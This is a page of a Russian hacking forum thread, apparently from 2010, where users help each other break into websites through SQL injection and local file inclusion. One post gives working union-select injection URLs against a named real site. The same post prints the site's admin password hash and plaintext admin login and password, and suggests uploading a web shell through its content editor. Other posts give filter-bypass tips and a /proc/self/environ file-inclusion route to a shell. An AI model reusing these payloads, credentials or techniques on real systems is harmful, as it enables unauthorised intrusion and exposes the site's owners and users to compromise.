ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11191  
Старый 12.01.2010, 03:56
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Цитата:
Сообщение от m0Hze  
Заюзай заместо /*, +--+
/* и +--+ и +--+- и { и # и -- и вообще без close, все равно
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1(вариации close sql),3' at line 1
Уже всю голову поломал себе... Разве никто не сталкивался? Спать хочу =(
 
Ответить с цитированием

  #11192  
Старый 12.01.2010, 04:04
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

У тебя инъекция в лимите походу
 
Ответить с цитированием

  #11193  
Старый 12.01.2010, 06:10
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от Imperou$  
и {
А это разве является коментарием?
 
Ответить с цитированием

  #11194  
Старый 12.01.2010, 06:49
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Цитата:
Сообщение от FaTRuS  
http://clean.kz/index.php?act=
Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
можно ли произвести локальный инклуд

И еще как узнать название всех таблиц в sql 4.1.25
Код:
http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())--
User : mysql_clean@localhost
Version : 4.1.25
Database : intserv_clean
OS : freebsd 6.3


Код:
http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,login,pass)+from+admin--
7b8fbb831c7c7163aa67b658ab3f3d64:28f9fb91cebfd9e08 dfc467ac2d735d9
http://clean.kz/admin/
Логин : cleanadmin
Пароль : 93mgpt5hm

В админке через "Редактор содержания" можешь залить шелл.
Таблицы в 4 ветке брутит надо (юзай SIPT)

Последний раз редактировалось shell_c0de; 12.01.2010 в 07:13..
 
Ответить с цитированием

  #11195  
Старый 12.01.2010, 07:13
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

Спасибо за помощь
 
Ответить с цитированием

  #11196  
Старый 12.01.2010, 14:53
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

Цитата:
Сообщение от Imperou$  
/* и +--+ и +--+- и { и # и -- и вообще без close, все равно

Уже всю голову поломал себе... Разве никто не сталкивался? Спать хочу =(
Попробуй # в urlencode
 
Ответить с цитированием

  #11197  
Старый 12.01.2010, 17:26
Gidz
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022

Репутация: 4
По умолчанию

народ, подскажите плз, что можно еще сделать.. допустим есть сайт, с ошибкой, пробую провести sql inj, вижу version() user() database(), кавычки не слешируются(magic_quotes_gpc = Off ?), пытаюсь вывести /etc/passwd , ничего не показывает, загрузить также ничего не смог, не хватает прав. Пытаюсь просмотреть таблицу, все поля выводит, но ничего интересного не могу найти, ни username, admin и тп, ничего нет. Что еще можно попробовать?

зы И вот еще
+group+by+1+--+ - пишет ошибку
+group+by+0+--+ - ошибки нет
как так может быть?

Последний раз редактировалось Gidz; 12.01.2010 в 18:44..
 
Ответить с цитированием

  #11198  
Старый 12.01.2010, 18:51
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Strilo4ka  
вопрос к знающим : нам что нибуть может дать каталог /proc и файлы внутри при експлуатации скулей? По поводу LFI знаю что возможно шелл проиинклудить подменив юсерагент ...
Ну если только у скули есть file_priv, не фильтруються кавычки, но нету прав для записи в папку доступной из веба, и есть lfi, то ты понел да?у /proc/self/enivron, насколько я знаю есть права на запись, ну ты понел?
 
Ответить с цитированием

  #11199  
Старый 12.01.2010, 19:13
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от Strilo4ka  
вопрос к знающим : нам что нибуть может дать каталог /proc и файлы внутри при експлуатации скулей? По поводу LFI знаю что возможно шелл проиинклудить подменив юсерагент ...
1) В скуле нет.
2) Шелл можно проинклюдить только при allow_url_include = On, а всегда можно выполнить произвольный PHP код.
 
Ответить с цитированием

  #11200  
Старый 13.01.2010, 00:57
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию

Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ